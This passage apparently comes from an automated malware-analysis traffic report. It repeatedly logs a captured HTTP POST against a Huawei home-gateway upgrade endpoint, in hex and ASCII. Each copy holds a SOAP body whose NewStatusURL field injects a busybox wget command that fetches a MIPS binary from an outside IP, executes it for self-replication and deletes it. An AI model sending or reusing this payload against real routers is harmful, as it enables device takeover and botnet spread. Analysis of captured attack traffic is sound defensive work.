3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 